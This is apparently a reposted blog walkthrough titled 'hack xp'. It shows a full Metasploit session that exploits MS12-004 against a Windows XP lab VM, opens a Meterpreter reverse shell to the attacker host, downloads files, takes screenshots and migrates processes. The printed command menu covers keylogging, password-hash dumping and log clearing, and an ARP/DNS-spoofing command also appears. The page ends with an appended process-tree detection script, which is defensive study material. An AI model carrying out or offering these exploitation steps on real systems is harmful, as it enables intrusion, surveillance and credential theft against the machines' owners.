hack xp by ms12_004_midi for metasploit
Source: Internet | Published: Criteria for filing online defamation cases | Editor: 程序博客网 | Time: 2024/05/16 06:02
local ip : 192.168.0.106
Not used in this run: ettercap -T -Q -i eth0 -M arp -P dns_spoof // //
Below are the commands used during the procedure, together with the output after running them:
root@bt:~# msfconsole
+-------------------------------------------------------+
| METASPLOIT by Rapid7 |
+---------------------------+---------------------------+
| __________________ | |
| ==c(______(o(______(_() | |""""""""""""|======[*** |
| )=\ | | EXPLOIT \ |
| // \\ | |_____________\_______ |
| // \\ | |==[msf >]============\ |
| // \\ | |______________________\ |
| // RECON \\ | \(@)(@)(@)(@)(@)(@)(@)/ |
| // \\ | ********************* |
+---------------------------+---------------------------+
| o O o | \'\/\/\/'/ |
| o O | )======( |
| o | .' LOOT '. |
| |^^^^^^^^^^^^^^|l___ | / _||__ \ |
| | PAYLOAD |""\___, | / (_||_ \ |
| |________________|__|)__| | | __||_) | |
| |(@)(@)"""**|(@)(@)**|(@) | " || " |
| = = = = = = = = = = = = | '--------------' |
+---------------------------+---------------------------+
=[ metasploit v4.5.0-dev [core:4.5 api:1.0]
+ -- --=[ 940 exploits - 501 auxiliary - 151 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops
msf > search ms12_004
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/windows/browser/ms12_004_midi 2012-01-10 00:00:00 UTC normal MS12-004 midiOutPlayNextPolyEvent Heap Overflow
msf > use exploit/windows/browser/ms12_004_midi
msf exploit(ms12_004_midi) > set SRVHOST 192.168.0.106
SRVHOST => 192.168.0.106
msf exploit(ms12_004_midi) > set SRVPORT 80
SRVPORT => 80
msf exploit(ms12_004_midi) > set URIPATH /
URIPATH => /
msf exploit(ms12_004_midi) > exploit -j    (once this is running, visit http://192.168.0.106:80/ from the target machine)
Exploit running as background job.
Started reverse handler on 192.168.0.106:4444
Using URL: http://192.168.0.106:80/
Server started.
msf exploit(ms12_004_midi) >
192.168.0.116 ms12_004_midi - Sending HTML
192.168.0.116 ms12_004_midi - Sending midi file
192.168.0.116 ms12_004_midi - Sending midi file
Sending stage (764928 bytes) to 192.168.0.116
Meterpreter session 1 opened (192.168.0.106:4444 -> 192.168.0.116:1250) at 2012-09-04 03:05:49 -0400
Session ID 1 (192.168.0.106:4444 -> 192.168.0.116:1250) processing InitialAutoRunScript 'migrate -f'
Current server process: iexplore.exe (1000)
Spawning notepad.exe process to migrate to
[+] Migrating to 1904
msf exploit(ms12_004_midi) > session[+] Successfully migrated to process
sesssion
[-] Unknown command: sesssesssion.
msf exploit(ms12_004_midi) > session
[-] Unknown command: session.
msf exploit(ms12_004_midi) > sessions
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 CAP-BC726022006\Administrator @ CAP-BC726022006 192.168.0.106:4444 -> 192.168.0.116:1250 (192.168.0.116)
msf exploit(ms12_004_midi) > sessions -i 1
Starting interaction with 1...
meterpreter > sysinfo
Computer : CAP-BC726022006
OS : Windows XP (Build 2600, Service Pack 3).
Architecture : x86
System Language : zh_CN
Meterpreter : x86/win32
meterpreter > ifconfig
Interface 1
============
Name : MS TCP Loopback interface
Hardware MAC : 00:00:00:00:00:00
MTU : 1520
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
Interface 2
============
Name : AMD PCNET Family PCI Ethernet Adapter - 数据包计划程序微型端口
Hardware MAC : 00:0c:29:37:8e:ff
MTU : 1500
IPv4 Address : 192.168.0.116
IPv4 Netmask : 255.255.255.0
meterpreter > pwd
$U$C:\Documents and Settings\Administrator\-0x433a5c446f63756d656e747320616e642053657474696e67735c41646d696e6973747261746f725cd7c0c3e6
meterpreter > cd \
meterpreter > ls
Listing: C:\
============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100777/rwxrwxrwx 0 fil 2012-07-03 04:54:50 -0400 AUTOEXEC.BAT
100666/rw-rw-rw- 0 fil 2012-07-03 04:54:50 -0400 CONFIG.SYS
40777/rwxrwxrwx 0 dir 2012-07-10 21:58:27 -0400 Documents and Settings
100444/r--r--r-- 0 fil 2012-07-03 04:54:50 -0400 IO.SYS
40777/rwxrwxrwx 0 dir 2012-08-07 22:01:44 -0400 MASM611
100444/r--r--r-- 0 fil 2012-07-03 04:54:50 -0400 MSDOS.SYS
100555/r-xr-xr-x 47564 fil 2008-04-14 08:00:00 -0400 NTDETECT.COM
40555/r-xr-xr-x 0 dir 2012-09-03 21:40:11 -0400 Program Files
40777/rwxrwxrwx 0 dir 2012-08-01 21:45:51 -0400 RECYCLER
40777/rwxrwxrwx 0 dir 2012-07-03 04:59:46 -0400 System Volume Information
40777/rwxrwxrwx 0 dir 2012-09-02 23:08:35 -0400 WINDOWS
100666/rw-rw-rw- 211 fil 2012-08-12 22:00:58 -0400 boot.ini
100444/r--r--r-- 322730 fil 2008-04-14 08:00:00 -0400 bootfont.bin
100666/rw-rw-rw- 29062 fil 2012-07-11 05:25:42 -0400 hacker.reg
100444/r--r--r-- 257728 fil 2008-04-14 08:00:00 -0400 ntldr
100666/rw-rw-rw- 805306368 fil 2012-09-04 02:29:41 -0400 pagefile.sys
40777/rwxrwxrwx 0 dir 2012-08-06 21:26:03 -0400 study
40777/rwxrwxrwx 0 dir 2012-09-03 22:42:53 -0400 tools
meterpreter > download boot.ini
downloading: boot.ini -> boot.ini
downloaded : boot.ini -> boot.ini
meterpreter > screenshot
Screenshot saved to: /root/lpDyTsaF.jpeg
meterpreter >
meterpreter > ?
Core Commands
=============
Command Description
------- -----------
? Help menu
background Backgrounds the current session
bgkill Kills a background meterpreter script
bglist Lists running background scripts
bgrun Executes a meterpreter script as a background thread
channel Displays information about active channels
close Closes a channel
disable_unicode_encoding Disables encoding of unicode strings
enable_unicode_encoding Enables encoding of unicode strings
exit Terminate the meterpreter session
help Help menu
info Displays information about a Post module
interact Interacts with a channel
irb Drop into irb scripting mode
load Load one or more meterpreter extensions
migrate Migrate the server to another process
quit Terminate the meterpreter session
read Reads data from a channel
resource Run the commands stored in a file
run Executes a meterpreter script or Post module
use Deprecated alias for 'load'
write Writes data to a channel
Stdapi: File system Commands
============================
Command Description
------- -----------
cat Read the contents of a file to the screen
cd Change directory
download Download a file or directory
edit Edit a file
getlwd Print local working directory
getwd Print working directory
lcd Change local working directory
lpwd Print local working directory
ls List files
mkdir Make directory
pwd Print working directory
rm Delete the specified file
rmdir Remove directory
search Search for files
upload Upload a file or directory
Stdapi: Networking Commands
===========================
Command Description
------- -----------
arp Display the host ARP cache
ifconfig Display interfaces
ipconfig Display interfaces
netstat Display the network connections
portfwd Forward a local port to a remote service
route View and modify the routing table
Stdapi: System Commands
=======================
Command Description
------- -----------
clearev Clear the event log
drop_token Relinquishes any active impersonation token.
execute Execute a command
getpid Get the current process identifier
getprivs Attempt to enable all privileges available to the current process
getuid Get the user that the server is running as
kill Terminate a process
ps List running processes
reboot Reboots the remote computer
reg Modify and interact with the remote registry
rev2self Calls RevertToSelf() on the remote machine
shell Drop into a system command shell
shutdown Shuts down the remote computer
steal_token Attempts to steal an impersonation token from the target process
sysinfo Gets information about the remote system, such as OS
Stdapi: User interface Commands
===============================
Command Description
------- -----------
enumdesktops List all accessible desktops and window stations
getdesktop Get the current meterpreter desktop
idletime Returns the number of seconds the remote user has been idle
keyscan_dump Dump the keystroke buffer
keyscan_start Start capturing keystrokes
keyscan_stop Stop capturing keystrokes
screenshot Grab a screenshot of the interactive desktop
setdesktop Change the meterpreters current desktop
uictl Control some of the user interface components
Stdapi: Webcam Commands
=======================
Command Description
------- -----------
webcam_list List webcams
webcam_snap Take a snapshot from the specified webcam
Priv: Elevate Commands
======================
Command Description
------- -----------
getsystem Attempt to elevate your privilege to that of local system.
Priv: Password database Commands
================================
Command Description
------- -----------
hashdump Dumps the contents of the SAM database
Priv: Timestomp Commands
========================
Command Description
------- -----------
timestomp Manipulate file MACE attributes
meterpreter > execute -f notepad.exe
Process 188 created.
meterpreter > info
Usage: info <module>
Prints information about a post-exploitation module
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process] 4294967295
4 0 System x86 0
164 1948 jusched.exe x86 0 CAP-BC726022006\Administrator C:\Program Files\Common Files\Java\Java Update\jusched.exe
172 1948 ctfmon.exe x86 0 CAP-BC726022006\Administrator C:\WINDOWS\system32\ctfmon.exe
188 1904 notepad.exe x86 0 CAP-BC726022006\Administrator C:\WINDOWS\System32\notepad.exe
372 1948 taskmgr.exe x86 0 CAP-BC726022006\Administrator C:\WINDOWS\system32\taskmgr.exe
544 4 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
580 676 vmtoolsd.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
608 544 csrss.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe
632 544 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe
676 632 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe
688 632 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe
844 676 vmacthlp.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmacthlp.exe
856 676 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
940 676 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
1000 1948 iexplore.exe x86 0 CAP-BC726022006\Administrator C:\Program Files\Internet Explorer\iexplore.exe
1068 676 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1140 676 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
1272 676 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
1404 676 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
1508 164 jucheck.exe x86 0 CAP-BC726022006\Administrator C:\Program Files\Common Files\Java\Java Update\jucheck.exe
1564 676 TPAutoConnSvc.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\TPAutoConnSvc.exe
1624 676 jqs.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\Java\jre7\bin\jqs.exe
1732 780 notepad.exe x86 0 CAP-BC726022006\Administrator C:\WINDOWS\System32\notepad.exe
1776 676 alg.exe x86 0 C:\WINDOWS\System32\alg.exe
1824 1068 wscntfy.exe x86 0 CAP-BC726022006\Administrator C:\WINDOWS\system32\wscntfy.exe
1904 1000 notepad.exe x86 0 CAP-BC726022006\Administrator C:\WINDOWS\System32\notepad.exe
1948 900 explorer.exe x86 0 CAP-BC726022006\Administrator C:\WINDOWS\Explorer.EXE
1968 1564 TPAutoConnect.exe x86 0 CAP-BC726022006\Administrator C:\Program Files\VMware\VMware Tools\TPAutoConnect.exe
2000 1256 notepad.exe x86 0 CAP-BC726022006\Administrator C:\WINDOWS\System32\notepad.exe
2020 1948 VMwareTray.exe x86 0 CAP-BC726022006\Administrator C:\Program Files\VMware\VMware Tools\VMwareTray.exe
2032 1948 vmtoolsd.exe x86 0 CAP-BC726022006\Administrator C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
meterpreter > migrate 1948
Migrating to 1948...
Migration completed successfully.
meterpreter > getpid
Current pid: 1948
meterpreter > background
Backgrounding session 1...
msf exploit(ms12_004_midi) > sessions
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 CAP-BC726022006\Administrator @ CAP-BC726022006 192.168.0.106:4444 -> 192.168.0.116:1250 (192.168.0.116)
msf exploit(ms12_004_midi) > sessions -d 1
Detaching session 1
msf exploit(ms12_004_midi) > session
[-] Unknown command: session.
msf exploit(ms12_004_midi) >
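As an added defender-side example (not code from the original post or from Metasploit), the following script parses a constructed subset of the `ps` listing above and flags the process chain that the 'migrate -f' autorun leaves behind on the target (iexplore.exe spawning a bare notepad.exe, which in turn spawns another notepad.exe); the browser and host-process name sets are assumptions chosen for this scenario.

```python
"""Process-tree check for the migration pattern seen in the session above.

Added example; it is not code from the original post or from Metasploit.
It parses constructed lines in the layout of Meterpreter's `ps` listing
(PIDs, names and paths copied from the page's output) and flags the
parent/child pairs that the InitialAutoRunScript 'migrate -f' run leaves
behind: a browser spawning a bare notepad.exe, and that notepad.exe then
spawning further processes.  The browser and host-process name sets are
assumptions chosen for this page's scenario.
"""
import re
from collections import defaultdict

# Constructed sample: a subset of the `ps` listing from the session above.
PS_OUTPUT = r"""
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
188 1904 notepad.exe x86 0 CAP-BC726022006\Administrator C:\WINDOWS\System32\notepad.exe
940 676 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
1000 1948 iexplore.exe x86 0 CAP-BC726022006\Administrator C:\Program Files\Internet Explorer\iexplore.exe
1904 1000 notepad.exe x86 0 CAP-BC726022006\Administrator C:\WINDOWS\System32\notepad.exe
1948 900 explorer.exe x86 0 CAP-BC726022006\Administrator C:\WINDOWS\Explorer.EXE
2000 1256 notepad.exe x86 0 CAP-BC726022006\Administrator C:\WINDOWS\System32\notepad.exe
"""

BROWSERS = {"iexplore.exe"}            # assumption: browsers in scope
HOST_CANDIDATES = {"notepad.exe"}      # assumption: what 'migrate -f' spawns


def parse_ps(text):
    """Turn a Meterpreter `ps` listing into a list of process dicts.

    The User column is blank for some SYSTEM/service processes, so the
    tail of each row is either 'User Path' or just 'Path'.  Names that
    contain spaces (e.g. '[System Process]') are not handled.
    """
    procs = []
    for line in text.splitlines():
        parts = line.split(maxsplit=5)
        if len(parts) < 5 or not parts[0].isdigit():
            continue  # header, separator or blank line
        pid, ppid, name, arch, session = parts[:5]
        rest = parts[5] if len(parts) > 5 else ""
        if re.match(r"(?:[A-Za-z]:|\\)", rest):   # path without a user
            user, path = "", rest
        else:
            user, _, path = rest.partition(" ")
        procs.append({"pid": int(pid), "ppid": int(ppid), "name": name,
                      "arch": arch, "session": session,
                      "user": user, "path": path})
    return procs


def find_migration_chains(procs):
    """Return (pid, ppid, reason) tuples for the two suspicious patterns."""
    name_of = {p["pid"]: p["name"].lower() for p in procs}
    children = defaultdict(list)
    for p in procs:
        children[p["ppid"]].append(p["pid"])
    findings = []
    for p in procs:
        pid, ppid, name = p["pid"], p["ppid"], p["name"].lower()
        parent = name_of.get(ppid, "")
        if name in HOST_CANDIDATES and parent in BROWSERS:
            findings.append((pid, ppid, f"{parent} spawned {name}"))
        if name in HOST_CANDIDATES and children[pid]:
            findings.append((pid, ppid, f"{name} has children {children[pid]}"))
    return findings


if __name__ == "__main__":
    for pid, ppid, reason in find_migration_chains(parse_ps(PS_OUTPUT)):
        print(f"PID {pid} (parent {ppid}): {reason}")
```

The same two rules apply to a live process snapshot (Sysmon event 1 or an EDR process tree), where a browser child with no command line that itself becomes a parent is the tell.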